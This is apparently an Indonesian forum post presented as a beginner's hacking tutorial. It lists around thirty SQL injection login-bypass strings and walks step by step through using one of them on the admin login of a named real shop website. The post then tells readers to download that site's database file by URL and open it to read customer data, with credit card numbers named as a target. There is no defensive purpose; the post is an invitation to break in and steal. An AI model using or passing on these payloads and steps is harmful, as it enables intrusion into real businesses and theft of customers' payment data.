ini adalah tutorial khusus (newbie)
kita akan mencoba membobol sebuah website shop dengan admin panel .
biasanya disana ada beberapa data costumer seperti:
-CC number
-Dll
ok lgsng aja ke intinya :
ikuti semua step" ini .
kita akan menggunakan string SQL seperti :
'or''='
'or'1'
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
[By Unknown]
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
[By Comsec]
ok step sekarang kita akan mulai berhacking ria .
1:cobalah buka google,lalu ketiklah shopadmin.asp
2:buka lah beberapa link .
3:saya membuka web
http://hoffmans.co.za/shopadmin.asp ( jika anda malas ikuti saja web itu )
(selanjutnya ikuti langkah" ini)
4:jika anda mengikutin URL yg ada di atas ini jika sudah terbuka nanti akan ada kotak untuk mengisi Username Dan Password
5:ketiklah username itu dengan nama "Admin"
6:sekarang kita akan menggunakan bug SQL injection (isilah password dengan 'or''=' (jgn ada yg di ubah satu karakter pun)
7:jika sudah berarti kita sudah succes
8:disana ada beberapa data" mengenai website dan customer
9:coba lah ganti linknya dengan
http://hoffmans.co.za/shopping.mdb
10:jika keluar window download (download file tersebut,itulah file yg berisi data" di website tersebut)
11:buka file tersebut dengan microsoft acces.
Enjoy ...
ini adalah tutorial untuk newbie.
jika ndan" ingin lebih mengerti dengan SQL injection agan" bisa kembangkan sndiri.
atau ndan" ingin ke forum tmpt saya berlatih (jiahh berlatih) datang saja ke
www.hhfun.com
see ya.
jika ada yg ingin di tanyakan post saja disini .
jgn lupa Melon nya